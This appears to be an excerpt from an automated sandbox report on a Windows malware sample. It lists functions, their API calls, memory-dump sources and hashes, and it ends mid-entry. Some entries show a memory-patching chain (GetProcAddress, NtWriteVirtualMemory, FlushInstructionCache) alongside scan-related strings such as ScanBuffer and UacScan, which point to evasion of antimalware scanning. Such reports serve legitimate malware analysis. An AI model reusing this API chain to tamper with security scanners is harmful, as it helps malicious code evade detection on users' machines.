                                                                                                                • String ID:
                                                                                                                • API String ID: 503785936-0
                                                                                                                • Opcode ID: bc6167976016c5be3918f600439e3fd44c11f54f3d596a04e59b1bd2109ca36d
                                                                                                                • Instruction ID: 899e55e7113ee0b168003f7950ca461544814804c42eebcbbe7509300efdc20c
                                                                                                                • Opcode Fuzzy Hash: bc6167976016c5be3918f600439e3fd44c11f54f3d596a04e59b1bd2109ca36d
                                                                                                                • Instruction Fuzzy Hash: 8C319570A807099FDB00EFE5CA817EEB7F6AB49704FA0D469F504AB380D77559068F61
                                                                                                                Function 02EDF212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,0303BA58), ref: 02EDF258
                                                                                                                • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02EDF2C3), ref: 02EDF290
                                                                                                                • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02EDF2C3), ref: 02EDF29B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 779948276-0
                                                                                                                • Opcode ID: 9ff3611d29ac7476056c1c5bafe00b2b8bd6637b8a50377fc7bdd4d923201ce2
                                                                                                                • Instruction ID: cf26a9d1307426a95c81e0616e5c37343630e8a5446016819f7605083f59cd83
                                                                                                                • Opcode Fuzzy Hash: 9ff3611d29ac7476056c1c5bafe00b2b8bd6637b8a50377fc7bdd4d923201ce2
                                                                                                                • Instruction Fuzzy Hash: A6113071680608AFD710EFA8D951E9E7BFDEB09300B60A465F504D7690DB35DE428F54
                                                                                                                Function 02EDF214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,0303BA58), ref: 02EDF258
                                                                                                                • RegSetValueExA.ADVAPI32(00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02EDF2C3), ref: 02EDF290
                                                                                                                • RegCloseKey.ADVAPI32(00000888,00000888,00000000,00000000,00000001,00000000,0000001C,00000000,02EDF2C3), ref: 02EDF29B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 779948276-0
                                                                                                                • Opcode ID: e501f262fd0b158e0636bfcfcb00374b4e391009d6c026fb370a063bb4872a64
                                                                                                                • Instruction ID: fd59dc7d4088c5ad57514cf79949ac647d2bc1603b1dd04fead2777994a98eda
                                                                                                                • Opcode Fuzzy Hash: e501f262fd0b158e0636bfcfcb00374b4e391009d6c026fb370a063bb4872a64
                                                                                                                • Instruction Fuzzy Hash: AF114271680608AFD710EFE8D951E9E7BFDEB09300F60A465F504D7690DB35DA428F54
                                                                                                                Function 02ECE364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 7abefcb86206452de996d6d5e66b2dc44c2d08a48f34b2e148b06c061c8ea044
                                                                                                                • Instruction ID: b8244a339cd058fa923dbcf37826604954b025594d7961e5e8fe6e86f6989a75
                                                                                                                • Opcode Fuzzy Hash: 7abefcb86206452de996d6d5e66b2dc44c2d08a48f34b2e148b06c061c8ea044
                                                                                                                • Instruction Fuzzy Hash: DAF0AF607D8100C78B207BFC8F846E9279A5F40344738F43EB80A9B201CB64AD47CB62
                                                                                                                Function 02EC4D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(02EDF4A4), ref: 02EC4C6E
                                                                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 02EC4D5B
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 02EC4D6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 986138563-0
                                                                                                                • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                • Instruction ID: 522cb8f8870c81ceacfc0e62e281688321a6708ae0031badc200b6850c7545e9
                                                                                                                • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                • Instruction Fuzzy Hash: 62E0E6FC1452055EFB185FA1DB50F7A66299FC1744B34E45DA804CD164D738D4426D38
                                                                                                                Function 02ED70DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 02ED73DA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString
                                                                                                                • String ID: H
                                                                                                                • API String ID: 3341692771-2852464175
                                                                                                                • Opcode ID: 0ae7a6eda27b3300891d85e220f4c5b6640b939b74d3c30e0aa202aad4ed9b77
                                                                                                                • Instruction ID: e8385d7b1e13364f637c5ac15cef9789aa0f1e1edafa216c966bd9c6b2c06e3e
                                                                                                                • Opcode Fuzzy Hash: 0ae7a6eda27b3300891d85e220f4c5b6640b939b74d3c30e0aa202aad4ed9b77
                                                                                                                • Instruction Fuzzy Hash: 24B1D074A816089FDB15CF99D880A9DFBF2FF89314F24D169E849AB360D730A846CF50
                                                                                                                Function 02ECE760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantCopy.OLEAUT32(00000000,00000000), ref: 02ECE781
                                                                                                                  • Part of subcall function 02ECE364: VariantClear.OLEAUT32(?), ref: 02ECE373
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCopy
                                                                                                                • String ID:
                                                                                                                • API String ID: 274517740-0
                                                                                                                • Opcode ID: c0c3db41763685bba4166854896b728522d64ba6ace266438c57721cd9089ce4
                                                                                                                • Instruction ID: 36a3a082acda477c7812a45137708aa635cb8f6eccf2e7b50570de9bed46f178
                                                                                                                • Opcode Fuzzy Hash: c0c3db41763685bba4166854896b728522d64ba6ace266438c57721cd9089ce4
                                                                                                                • Instruction Fuzzy Hash: 3311912178421087C730ABA8CBC4AA6769AAF4575073CF43EF50A8B209DB308C43CAA1
                                                                                                                Function 02ECE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1927566239-0
                                                                                                                • Opcode ID: 0f222df403deec479a75a99e0e4da7f7e6eb2e5dff2464cb6a1181868c8486c4
                                                                                                                • Instruction ID: 122c5c9ec114cff46b2e37b4d1787ce0148778cb6221021d1f7e59a8c992aaad
                                                                                                                • Opcode Fuzzy Hash: 0f222df403deec479a75a99e0e4da7f7e6eb2e5dff2464cb6a1181868c8486c4
                                                                                                                • Instruction Fuzzy Hash: 4C3164716802089FDB14DFE8CA84AAE77E8FB0C305F689569F905D3240D334D952CBA1
                                                                                                                Function 02ED89D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED81CC: GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                  • Part of subcall function 02ED7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02ED7DEC
                                                                                                                  • Part of subcall function 02ED8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02ED83C2), ref: 02ED83A4
                                                                                                                • FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,02F4738C,Function_0000662C,00000004,02F4739C,02F4738C,05F5E103,00000040,02F473A0,74F60000,00000000,00000000), ref: 02ED8AAA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 1478290883-0
                                                                                                                • Opcode ID: a81d7562a498db272871d76cedb09e7d618d66b98b402766c13437b101f596f1
                                                                                                                • Instruction ID: e86f8d77984fdc39928e2360ce82851a0c361776d48d833191552a12fe07135c
                                                                                                                • Opcode Fuzzy Hash: a81d7562a498db272871d76cedb09e7d618d66b98b402766c13437b101f596f1
                                                                                                                • Instruction Fuzzy Hash: AE2157706C03046FE750FBF4DD12B6EF7EA9B44B44F61A864B604E7180DBB599168A18
                                                                                                                Function 02ED6D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32(00000000,?,00000000,02ED6DB9,?,?,?,00000000), ref: 02ED6D99
                                                                                                                  • Part of subcall function 02EC4C60: SysFreeString.OLEAUT32(02EDF4A4), ref: 02EC4C6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeFromProgString
                                                                                                                • String ID:
                                                                                                                • API String ID: 4225568880-0
                                                                                                                • Opcode ID: cb3aa1242804cba07520796cbbeffe643b6ab1757e9ef67ace87339588df8d4b
                                                                                                                • Instruction ID: 8e77e0bc0e81a356b2570136944f9e0d4c16e12a5bdefa419c827e38dc55ef09
                                                                                                                • Opcode Fuzzy Hash: cb3aa1242804cba07520796cbbeffe643b6ab1757e9ef67ace87339588df8d4b
                                                                                                                • Instruction Fuzzy Hash: 32E0E5352802087BE311FBA6FD51D8E7BBDDB8B700B6194B5F40093550DA316D018860
                                                                                                                Function 02EC5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(02EC0000,?,00000105), ref: 02EC5886
                                                                                                                  • Part of subcall function 02EC5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5AE8
                                                                                                                  • Part of subcall function 02EC5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5B06
                                                                                                                  • Part of subcall function 02EC5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EC0000,02EEE790), ref: 02EC5B24
                                                                                                                  • Part of subcall function 02EC5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02EC5B42
                                                                                                                  • Part of subcall function 02EC5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02EC5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02EC5B8B
                                                                                                                  • Part of subcall function 02EC5ACC: RegQueryValueExA.ADVAPI32(?,02EC5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02EC5BD1,?,80000001), ref: 02EC5BA9
                                                                                                                  • Part of subcall function 02EC5ACC: RegCloseKey.ADVAPI32(?,02EC5BD8,00000000,?,?,00000000,02EC5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02EC5BCB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 2796650324-0
                                                                                                                • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                • Instruction ID: 6ee1cfe08db304bd08d3ec7082df935fba80da13f779b6893e0e1ee9dff05dee
                                                                                                                • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                • Instruction Fuzzy Hash: 02E06D72A403149FCB10DE9CC9C0B8633D8AB08754F549965ED58DF346D7B1E9208BE0
                                                                                                                Function 02EC7DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02EC7DF4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3934441357-0
                                                                                                                • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                • Instruction ID: 94e53059ba7f0012cd2ed43e635ede58c73b2ebe715994a268202562fd3e1c17
                                                                                                                • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                • Instruction Fuzzy Hash: 75D05BB23491507BE224965A5D44EA75BDCCFC6770F10463DF568C7180D7208C01C671
                                                                                                                Function 02EC7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02EE356F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanBuffer,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,Initialize), ref: 02EC7E8B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                • Instruction ID: aec7f552f372910844f55f654ed8bf7c896589320776d703abd5a180a0687164
                                                                                                                • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                • Instruction Fuzzy Hash: 76C08CF32912010E1E60A6FC1EC42AA42CD098413D770BE2DF838CA2C1D3169C232C20
                                                                                                                Function 02EC7E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02EE041F,ScanString,02F47380,02EEB7B8,OpenSession,02F47380,02EEB7B8,ScanString,02F47380,02EEB7B8,UacScan,02F47380,02EEB7B8,UacInitialize), ref: 02EC7E67
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3188754299-0
                                                                                                                • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                • Instruction ID: bb6c4671b717a5c8369240fa3169219e3342650afd3cde14368d2ad1259db438
                                                                                                                • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                                                                • Instruction Fuzzy Hash: F0C08CF22812000E5A54A6FC2EC425A52CE094423C374BA2DF838C62E2D32298A32C10
                                                                                                                Function 02EC4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString
                                                                                                                • String ID:
                                                                                                                • API String ID: 3341692771-0
                                                                                                                • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                • Instruction ID: c40681f869b767538026166e669d6a225f85b56f125839d19be4fc58278e6186
                                                                                                                • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                • Instruction Fuzzy Hash: C5C012A668023057FB2156D9EEC0B9662DC9B05298B2450A5A408DB2A5E360D80156A0
                                                                                                                Function 02EEC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • timeSetEvent.WINMM(00002710,00000000,02EEC350,00000000,00000001), ref: 02EEC36C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
